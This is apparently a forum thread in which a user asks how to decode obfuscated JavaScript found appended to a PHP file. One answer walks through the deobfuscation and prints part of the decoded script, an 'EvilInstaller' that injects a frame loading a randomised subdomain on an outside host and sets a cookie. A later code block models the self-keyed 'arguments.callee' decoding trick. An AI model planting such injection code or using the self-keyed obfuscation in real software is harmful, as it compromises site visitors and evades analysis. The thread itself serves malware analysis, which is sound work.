How would you reverse engineer this?

Backend · Unresolved · 7 · 735
我在风中等你 2021-02-10 13:54

I've got some code that was at the bottom of a php file that is in javascript. It goes through lots of weird contortions like converting hex to ascii then doing regex replacem

7 answers
  •  时光说笑
    2021-02-10 14:00

    You can just go through it stage by stage - since it's Javascript, and it's interpreted, it needs to be its own decryptor. If you have access to a command-line Javascript interpreter (such as the Console in Firebug), this will be fairly straightforward.

    I'll have a look and see what comes up.

    Edit: I've got through most of it - it seems like the final step is non-trivial, probably because it involves "argument.callee". Anyway I've put up what I have so far on Pastebin.

    Interestingly I found the hardest part of this was giving the gibberish variables proper names. It reminded me of a crossword, or sudoku, where you know how things are related, but you can't definitively assign something until you work out what its dependent parts are. :-) I'm sure that if someone recognises the algorithm they can give the parts more meaningful names, but at the bit where there's a lot of XORing going on, there are two temporary variables that I've just left as their default names since I don't know enough context to give them useful ones.

    Final edit: The 'arguments.callee' bit became easy when I realised I could just pass in the raw text that I'd ironically just been decoding (it's quite a clever technique, so that normal deobfuscation won't work because of course once you rename the variables, etc, the value is different). Anyway, here's your script in full:

    
        function EvilInstaller(){};
        EvilInstaller.prototype = {
            getFrameURL : function() {
                var dlh=document.location.host;
                return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.host + this.path;
            },
            path:'/elanguage.cn/',
            cookieValue:1,
            setCookie : function(name, value) {
                var d= new Date();
                d.setTime(new Date().getTime() + 86400000);
                document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString();
            },
            install : function() {
                if (!this.alreadyInstalled()) {
                    var s = "
    "
                    try {
                        document.open();
                        document.write(s);
                        document.close();
                    } catch(e) {
                        document.write("" + s + "")
                    }
                    this.setCookie(this.cookieName, this.cookieValue);
                }
            },
            getRandString : function() {
                var l=16,c='0Z1&2Q3Z4*5&6Z7Q8*9)a*b*cQdZeQf*'.replace(/[ZQ&\*\)]/g, '');
                var o='';
                for (var i=0;i
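The 'arguments.callee' trick and the workaround the answer describes, modelled as an added example (not the answerer's code and not the sample's): the decoder keys itself off its own source text, so renaming its variables changes the key, and the fix is to hand it the raw text copied from the file. The names (keyFromSource, selfKeyedDecode), the FNV hash and the marker payload are constructed for this demo.

```javascript
// Constructed example, not from the original post: a model of the self-keyed
// decoder the answer describes, plus the analyst's raw-text workaround.

// 32-bit FNV-1a hash of the decoder's own source text; any edit changes it.
function keyFromSource(src) {
  var h = 0x811c9dc5;
  for (var i = 0; i < src.length; i++) {
    h ^= src.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h;
}

// XOR the hex payload with key bytes derived from `src`. With no override the
// decoder keys off its own source, as arguments.callee.toString() does in the
// sample; a named self-reference is used here so the block runs in strict mode.
function selfKeyedDecode(hexPayload, srcOverride) {
  var src = srcOverride === undefined ? selfKeyedDecode.toString() : srcOverride;
  var key = keyFromSource(src);
  var out = '';
  for (var j = 0; j * 2 < hexPayload.length; j++) {
    var k = (key >>> ((j % 4) * 8)) & 0xff;
    out += String.fromCharCode(parseInt(hexPayload.substr(j * 2, 2), 16) ^ k);
  }
  return out;
}

// Builds the demo payload; a real sample ships it precomputed.
function selfKeyedEncode(plain, src) {
  var key = keyFromSource(src), hex = '';
  for (var i = 0; i < plain.length; i++) {
    var k = (key >>> ((i % 4) * 8)) & 0xff;
    hex += ((plain.charCodeAt(i) ^ k) | 0x100).toString(16).slice(1);
  }
  return hex;
}

// The decoder text exactly as it sits in the file, copied before any editing.
var rawTextFromFile = selfKeyedDecode.toString();
var MARKER = 'stage-2 marker (constructed)';
var payload = selfKeyedEncode(MARKER, rawTextFromFile);
// The untouched decoder works.
function decodeUntouched() { return selfKeyedDecode(payload); }
// After a renaming pass the source text, hence the key, is different: garbage.
function decodeAfterRename() {
  return selfKeyedDecode(payload, rawTextFromFile.replace(/selfKeyedDecode/g, 'f'));
}
// The answer's trick: feed the decoder the raw text instead of its edited self.
function decodeWithRawText() { return selfKeyedDecode(payload, rawTextFromFile); }
```

The same idea applies when the real sample is run in a sandboxed interpreter: replace the `arguments.callee.toString()` call with a string literal holding the function text copied verbatim from the PHP file, and the decoder no longer cares what you rename.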
